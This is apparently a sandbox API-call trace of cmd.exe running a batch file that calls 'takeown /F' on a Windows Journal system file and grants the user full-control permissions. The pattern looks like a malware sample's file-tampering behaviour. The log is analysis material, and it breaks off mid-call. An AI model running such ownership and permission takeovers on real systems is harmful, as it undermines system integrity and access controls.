_wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0216.639] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0216.639] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0216.639] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0216.639] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0216.639] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0216.639] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0216.639] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0216.639] SetErrorMode (uMode=0x0) returned 0x0 [0216.640] SetErrorMode (uMode=0x1) returned 0x0 [0216.640] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f8e8, lpFilePart=0x24eebc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24eebc*="Desktop") returned 0x1d [0216.640] SetErrorMode (uMode=0x0) returned 0x1 [0216.640] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0216.640] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.640] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.640] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.640] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0216.640] GetLastError () returned 0x2 [0216.640] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.640] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0216.640] GetLastError () returned 0x2 [0216.640] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.641] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0x430b68 [0216.641] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0216.641] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0216.641] GetLastError () returned 0x2 [0216.641] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0x430b68 [0216.641] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0216.641] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.641] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.641] GetConsoleTitleW (in: lpConsoleTitle=0x24ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.641] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0216.641] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0216.641] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0216.641] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0216.641] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0216.641] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0216.641] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0216.641] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0216.641] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0216.641] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0216.641] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0216.641] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0216.641] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0216.641] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0216.641] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0216.641] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0216.642] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0216.642] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0216.642] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0216.642] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0216.642] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0216.642] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0216.642] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0216.642] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0216.642] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0216.642] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0216.642] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0216.642] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0216.642] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0216.642] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0216.642] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0216.642] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0216.642] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0216.642] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0216.642] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0216.642] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0216.642] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0216.642] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0216.642] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0216.642] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0216.642] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0216.642] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0216.642] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0216.642] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0216.642] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0216.642] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0216.643] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0216.643] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0216.643] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0216.643] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0216.643] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0216.643] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0216.643] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0216.643] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0216.643] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0216.643] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0216.643] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0216.643] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0216.643] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0216.643] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0216.643] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0216.643] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0216.643] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0216.643] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0216.643] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0216.643] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0216.643] SetErrorMode (uMode=0x0) returned 0x0 [0216.643] SetErrorMode (uMode=0x1) returned 0x0 [0216.643] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43cd48, lpFilePart=0x24e79c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24e79c*="Desktop") returned 0x1d [0216.643] SetErrorMode (uMode=0x0) returned 0x1 [0216.643] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0216.643] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.643] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.644] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0216.644] GetLastError () returned 0x2 [0216.644] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.644] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0216.644] GetLastError () returned 0x2 [0216.644] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0x430b68 [0216.644] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0216.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0216.644] GetLastError () returned 0x2 [0216.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0x430b68 [0216.644] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0216.644] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.644] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.644] GetConsoleTitleW (in: lpConsoleTitle=0x24ea1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.645] InitializeProcThreadAttributeList (in: lpAttributeList=0x24e948, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24e92c | out: lpAttributeList=0x24e948, lpSize=0x24e92c) returned 1 [0216.645] UpdateProcThreadAttribute (in: lpAttributeList=0x24e948, dwFlags=0x0, Attribute=0x60001, lpValue=0x24e934, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24e948, lpPreviousValue=0x0) returned 1 [0216.645] GetStartupInfoW (in: lpStartupInfo=0x24e980 | out: lpStartupInfo=0x24e980*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0216.645] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.646] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.646] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0216.646] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0216.646] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0216.646] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.646] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x24e8d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24e91c | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", lpProcessInformation=0x24e91c*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x96c, dwThreadId=0x99c)) returned 1 [0216.652] CloseHandle (hObject=0xb8) returned 1 [0216.652] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.652] GetEnvironmentStringsW () returned 0x43b2e8* [0216.652] FreeEnvironmentStringsA (penv="=") returned 1 [0216.652] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0218.501] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x24e8b4 | out: lpExitCode=0x24e8b4*=0x0) returned 1 [0218.501] CloseHandle (hObject=0xb0) returned 1 [0218.501] _vsnwprintf (in: _Buffer=0x24e99c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24e8bc | out: _Buffer="00000000") returned 8 [0218.501] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.501] GetEnvironmentStringsW () returned 0x43b2e8* [0218.501] FreeEnvironmentStringsA (penv="=") returned 1 [0218.501] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.501] GetEnvironmentStringsW () returned 0x43b2e8* [0218.501] FreeEnvironmentStringsA (penv="=") returned 1 [0218.501] DeleteProcThreadAttributeList (in: lpAttributeList=0x24e948 | out: lpAttributeList=0x24e948) [0218.501] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.501] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0218.502] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.502] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0218.505] _get_osfhandle (_FileHandle=0) returned 0x38 [0218.505] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0218.505] SetConsoleInputExeNameW () returned 0x1 [0218.505] GetConsoleOutputCP () returned 0x1b5 [0218.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0218.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.506] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0218.506] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0218.506] _get_osfhandle (_FileHandle=3) returned 0xb0 [0218.506] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0218.506] _get_osfhandle (_FileHandle=3) returned 0xb0 [0218.506] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0218.506] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0xb3, lpOverlapped=0x0) returned 1 [0218.506] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0218.507] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0218.507] _get_osfhandle (_FileHandle=3) returned 0xb0 [0218.507] GetFileType (hFile=0xb0) returned 0x1 [0218.507] _get_osfhandle (_FileHandle=3) returned 0xb0 [0218.507] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0218.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", nBufferLength=0x208, lpBuffer=0x24e828, lpFilePart=0x24e7ec | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", lpFilePart=0x24e7ec*="jnwdui.dll.mui") returned 0x35 [0218.507] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0218.507] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0218.507] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0218.507] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0218.507] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0218.507] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0218.507] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0218.507] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0218.507] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0218.507] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0218.508] _wcsicmp (_String1="set", _String2=")") returned 74 [0218.508] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0218.508] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0218.508] _wcsicmp (_String1="IF", _String2="set") returned -10 [0218.508] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0218.508] _wcsicmp (_String1="REM", _String2="set") returned -1 [0218.508] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0218.508] _tell (_FileHandle=3) returned 63 [0218.508] _close (_FileHandle=3) returned 0 [0218.508] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ee70 | out: _Buffer="\r\n") returned 2 [0218.508] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.508] GetFileType (hFile=0x3c) returned 0x2 [0218.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0218.508] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee48 | out: lpMode=0x24ee48) returned 1 [0218.514] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.514] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ee60, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ee60*=0x2) returned 1 [0218.519] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0218.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0218.520] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ee6c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0218.520] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ee6c | out: _Buffer=">") returned 1 [0218.520] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.520] GetFileType (hFile=0x3c) returned 0x2 [0218.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0218.520] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee4c | out: lpMode=0x24ee4c) returned 1 [0218.520] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.520] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ee64, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ee64*=0x1e) returned 1 [0218.520] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.520] GetFileType (hFile=0x3c) returned 0x2 [0218.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0218.520] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0ec | out: lpMode=0x24f0ec) returned 1 [0218.521] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.521] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x448370*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f104, lpReserved=0x0 | out: lpBuffer=0x448370*, lpNumberOfCharsWritten=0x24f104*=0x3) returned 1 [0218.521] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f10c | out: _Buffer=" FN=\"jnwdui.dll.mui\" ") returned 21 [0218.521] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.521] GetFileType (hFile=0x3c) returned 0x2 [0218.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0218.521] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0218.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.522] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: 